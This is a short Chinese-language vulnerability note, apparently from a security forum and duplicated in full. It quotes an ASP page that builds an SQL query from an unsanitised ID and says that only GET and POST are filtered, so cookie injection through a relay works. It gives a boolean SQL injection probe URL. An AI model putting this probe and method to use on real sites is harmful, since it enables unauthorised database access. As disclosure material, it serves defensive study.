以下是引用片段: <%@ LANGUAGE = VBScript.Encode %> sql="select * from cg_Product where ID=" & ID & "" |
只过滤了 get post,存在 cookie 注射,注入中转即可。
amanda/cg_ProductShow.asp
http://localhost/jmCook.asp?jmdcw=169%20and%201=1
以下是引用片段: <%@ LANGUAGE = VBScript.Encode %> sql="select * from cg_Product where ID=" & ID & "" |
只过滤了 get post,存在 cookie 注射,注入中转即可。
amanda/cg_ProductShow.asp
http://localhost/jmCook.asp?jmdcw=169%20and%201=1